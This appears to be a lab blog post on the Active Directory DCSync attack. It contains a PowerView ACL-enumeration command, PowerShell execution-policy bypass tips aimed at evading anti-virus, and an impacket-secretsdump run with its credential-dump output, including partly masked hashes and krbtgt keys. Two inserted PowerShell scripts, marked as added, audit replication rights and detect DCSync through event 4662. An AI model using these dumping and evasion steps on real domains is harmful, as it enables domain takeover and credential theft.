DCSync

DCSync Attack

Hello again, and let’s take a look at the DCSync attack today. As I compose this blog, I’m performing the attack in my own lab environment.

DCSync Attack Background

Let’s understand AD replication before diving into the DCSync attack. In a real-world environment there are usually multiple domain controllers (DCs). Having DCs in various locations lets policies and authentication rules be synchronized for each location, so it is crucial that all DCs stay in sync with one another. This synchronization is carried out through the “Microsoft Directory Replication Service Remote Protocol (MS-DRSR)”.

To guarantee uniformity in configuration updates for every attribute and object, as well as to prevent perpetual replication loops, Active Directory employs various counters and tables. The segmentation of replication is achieved through the use of naming contexts (NC), also referred to as directory partitions. Within each forest, there are at least three Naming Contexts: i) Domain NC, ii) Configuration NC, and iii) Schema NC. Active Directory additionally supports specialized NCs known as application partitions or non-domain NCs (NDNC). NDNC is utilized by DNS.

Once an attacker has compromised a Windows machine, there are several techniques they can employ to dump credentials and escalate privileges, such as reading LSASS memory, the SAM database or cached domain credentials, or abusing the directory replication permissions.

DCSync Attack

DCSync is a technique for extracting credentials from a domain controller. In this attack, an adversary takes advantage of the Microsoft Directory Replication Service Remote Protocol (MS-DRSR) and requests replication using the ‘GetNCChanges’ function. The domain controller answers the replication request with directory data that includes password hashes. Three replication rights are needed by the account used to perform the DCSync attack.

This attack relies on the Directory Replication Service Remote Protocol (MS-DRSR); this service cannot be disabled. These privileges are limited to “Domain Admins”, “Enterprise Admins” and the “Domain Controllers” group. An attacker would load mimikatz and run the DCSync command from the ‘lsadump’ module, specifying the target domain controller and domain account.

The “DCSync” command in mimikatz allows an attacker to impersonate a domain controller and retrieve password hashes from another domain controller without executing any code on the target. This is possible because MS-DRSR’s ‘DRSGetNCChanges’ method replicates a Naming Context (NC) replica from the server.

An NC replica is a variable containing a tree of objects whose root object is identified by a naming context (NC). The ‘IDL_DRSGetNCChanges’ method replicates updates from an NC replica on the server.

Naming Context – The Naming Context (NC) is a set of objects organized as a tree. It is referenced by a DSName. The DN of the DSName is the distinguishedName attribute of the tree root. The GUID of the DSName is the objectGUID attribute of the tree root.

Attack Scenario and Lab Environment

I was struggling to run PowerView.ps1 over Evil-WinRM and learned that, to run it on a machine, you start PowerShell with “powershell -exec bypass”, “powershell.exe -nop -exec bypass” or “powershell -ep bypass” and then load the PowerView script: PS> Import-Module .\powerview.ps1

To perform enumeration, we are going to use PowerView. You can follow the guideline above on how to use PowerView properly without getting caught by your local anti-virus tools.

Enumerating and Exploiting DCSync

Import the ‘Recon’ module from PowerSploit, then run the following command.

Get-ObjectAcl -DistinguishedName "dc=ringbuffer,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

Get-ObjectAcl retrieves the ACLs of a specific Active Directory object. The ‘GenericAll’ permission grants all possible rights on the object, while ‘WriteDacl’ grants the right to modify the object’s discretionary access control list (DACL), which lets the holder grant themselves the replication rights.

It’s important to note that our Administrator user has the DCSync rights. Keep in mind that the ‘Administrator’ account and the ‘Domain Admins’, ‘Enterprise Admins’ and ‘Domain Controllers’ groups can execute the DCSync attack, allowing them to pull down password hashes. Read-Only Domain Controller accounts, however, do not possess these rights.
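The same ACL data that PowerView enumerates above is what a defender should review regularly: anyone who holds the replication extended rights (or GenericAll/WriteDacl) on the domain naming context can DCSync it. The script below is an added example, not code from the original post; it uses the RSAT ActiveDirectory module and the AD: drive rather than PowerView, and the list of expected holders is an assumption for a default installation that you should adjust to your environment. The three rights GUIDs are the fixed schema values of the DS-Replication-Get-Changes rights (the ones PowerView’s ‘replication-get’ filter matches).

```powershell
# Added example, not from the original post: audit which principals hold the
# replication extended rights on the domain naming context and report any
# holder that is not an expected replication principal.
# Assumes the RSAT ActiveDirectory module and read access to the domain object.
Import-Module ActiveDirectory

# rightsGuid values of the three replication extended rights (fixed schema values).
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$NullGuid = '00000000-0000-0000-0000-000000000000'

# Principals that legitimately hold these rights in a default installation.
# Assumption: extend this for your own sync or backup service accounts.
$ExpectedHolders = @('ENTERPRISE DOMAIN CONTROLLERS', 'Domain Controllers', 'SYSTEM',
                     'Administrators', 'Domain Admins', 'Enterprise Admins')

function Get-ReplicationRightHolders {
    param([string]$DomainDn = (Get-ADDomain).DistinguishedName)

    $acl = Get-Acl -Path "AD:\$DomainDn"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }

        $guid   = $ace.ObjectType.ToString().ToLower()
        $rights = $ace.ActiveDirectoryRights
        $grants = @()

        if ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll)) {
            # GenericAll implies every right, including the replication rights.
            $grants += 'GenericAll'
        } else {
            # An explicit replication right on the NC.
            if ($ReplicationRights.ContainsKey($guid)) { $grants += $ReplicationRights[$guid] }
            # An ExtendedRight ACE with the null GUID covers every extended right.
            elseif ($guid -eq $NullGuid -and
                    $rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)) {
                $grants += 'All extended rights'
            }
            # WriteDacl lets the holder grant the replication rights to itself.
            if ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::WriteDacl)) {
                $grants += 'WriteDacl'
            }
        }
        if ($grants.Count -eq 0) { continue }

        $identity = $ace.IdentityReference.Value
        [pscustomobject]@{
            Identity   = $identity
            Grants     = ($grants -join ', ')
            Inherited  = $ace.IsInherited
            # Anything outside the expected set deserves a look: it can DCSync the domain.
            Unexpected = -not ($identity.Split('\')[-1] -in $ExpectedHolders)
        }
    }
}

# Usage: list only the holders you did not expect.
Get-ReplicationRightHolders | Where-Object { $_.Unexpected } | Format-Table -AutoSize
```

Run it from a domain-joined host as a user that can read the domain object. Every row marked Unexpected is an account or group that could perform the attack described in this post; in the lab above, the Administrator account appears because it is a member of the built-in Administrators group.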

With mimikatz it is possible to extract the password hash of the KRBTGT account, which enables the creation of Kerberos golden tickets. In this scenario, mimikatz is run on a Windows server to extract the KRBTGT hash.

We can spin up our Kali instance and use Impacket’s secretsdump to obtain the NTLM hashes.

┌──(ringbuffer㉿kali)-[~/Downloads]
└─$ impacket-secretsdump -outputfile 'dcsync' 'ringbuffer.local'/'Administrator':'******************'@'ringbuffer.local'
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x9eee9e94d*****************18
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aa*****************1404ee:cb8*****************0d60f5dc:::
Guest:501:aad3b4*****************ad3b435b51404ee:31d6c**********************************9c0:::
DefaultAccount:503:aa*****************04ee:31d6cfe*****************089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
RINGBUFFER\DC$:aes256-cts-hmac-sha1-96:11**********************************078cbea78727b6593725ec5d45
RINGBUFFER\DC$:aes128-cts-hmac-sha1-96:5c***************************************************08ff8e8391e964
RINGBUFFER\DC$:des-cbc-md5:ae6d542f8c261923
RINGBUFFER\DC$:plain_password_hex:b***************************************************************************************************************************************************************************************************************************************************************f
RINGBUFFER\DC$:aad3b435*****************b435b51404ee:e6b22da*****************45f02d24ce:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x40b37be51b98c9444*****************4e8c
dpapi_userkey:0xf1d8975337bd67c3*****************fc8
[*] NL$KM 
 0000   E5 B2 50 19 36 7B 3E 18  75 7C 49 8C 28 BD 0E A9   ..P.1{>.u.R.(...
 0010   8B 23 95 F4 48 7D 4E 78  63 6F 37 6A 69 52 B1 02   .#..W}....7jiR..
 0020   D0 6F 98 16 76 D6 79 C0  CD A8 08 B7 F3 A8 D7 FD   .o..v.y.........
 0030   5D 87 14 DD FA 37 5B 42  02 9C A0 FF 0B B0 B7 C5   ]....7[B........
NL$KM:e5b250***************************************************679c0cda808b7f3a8d7fd*****************0bb0b7c5
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b*****************1404ee:cb8a4283854*****************10d60f5dc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b*****************b435b51404ee:9edfe55400a9da**********************************bc5e84:::
ringbuffer.local\w*****************n:1103:aad3b435b51*****************5b51404ee:cb8a4283**********************************dc:::
LAB-FAKEPC$:1105:aad3b**********************************1404ee:e8020b2a**********************************1c0c467a2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:547***************************************************648423ad
Administrator:aes128-cts-hmac-sha1-96:bbe9**********************************587e1d87caa151eb
Administrator:des-cbc-md5:ab6b**********************************0464ec86
krbtgt:aes256-cts-hmac-sha1-96:3b627d5**********************************084a252ce9a6f331f3aa8d8169f5b910e0f7
krbtgt:aes128-cts-hmac-sha1-96:72212e**********************************9e7e36b0b14701ba3c
krbtgt:des-cbc-md5:c710c*****************2f1fb
DC$:aes256-cts-hmac-sha1-96:11dea0b8c907d05ef48080f**********************************78727b6593725ec5d45
DC$:aes128-cts-hmac-sha1-96:5c0d05a231*****************f8e8391e964
DC$:des-cbc-md5:8a452967fe979216
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
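The “Using the DRSUAPI method to get NTDS.DIT secrets” step above is the part a domain controller can see: each replication request is recorded in the DC’s Security log as event 4662 when “Audit Directory Service Access” is enabled, with the replication rights GUIDs listed in the event’s Properties field. The script below is an added example, not code from the original post, that pulls those events and flags replication requests from user accounts, which is the DCSync signature (legitimate replication comes from DC machine accounts, whose names end in ‘$’). It assumes the audit policy is enabled on the DC and that the caller can read its Security log remotely.

```powershell
# Added example, not from the original post: hunt for DCSync-style replication
# requests in a domain controller's Security log. Assumes "Audit Directory
# Service Access" is enabled on the DC so that event 4662 is recorded, and that
# the caller can read the remote Security log.
$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'   # DS-Replication-Get-Changes-In-Filtered-Set
)

function Find-ReplicationRequests {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,   # the DC whose log to read
        [int]$Hours = 24
    )
    $filter = @{ LogName = 'Security'; Id = 4662; StartTime = (Get-Date).AddHours(-$Hours) }

    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Flatten the EventData name/value pairs of this event into a hashtable.
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

            # 4662 records control-access rights as GUIDs in 'Properties';
            # AccessMask 0x100 is CONTROL_ACCESS, i.e. an extended right was exercised.
            $used = $ReplicationGuids | Where-Object { $data['Properties'] -match $_ }
            if ($data['AccessMask'] -eq '0x100' -and $used) {
                $user = $data['SubjectUserName']
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Subject = "$($data['SubjectDomainName'])\$user"
                    Object  = $data['ObjectName']
                    Rights  = ($used -join ', ')
                    # Real replication comes from DC machine accounts (names end in '$').
                    # A user account exercising these rights is the DCSync signature.
                    Suspect = -not $user.EndsWith('$')
                }
            }
        }
}

# Usage: show only replication requests that did not come from a machine account.
Find-ReplicationRequests -Hours 24 | Where-Object { $_.Suspect } | Format-Table -AutoSize
```

In the lab above this would surface the Administrator account requesting DS-Replication-Get-Changes-All against the domain object at the time secretsdump ran. Tune the Suspect rule for any service account in your environment that legitimately replicates under a user identity, and forward 4662 from all DCs to central logging so the check does not depend on which DC the request hit.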

That’s all.

Thank you for reading and let me know your thoughts.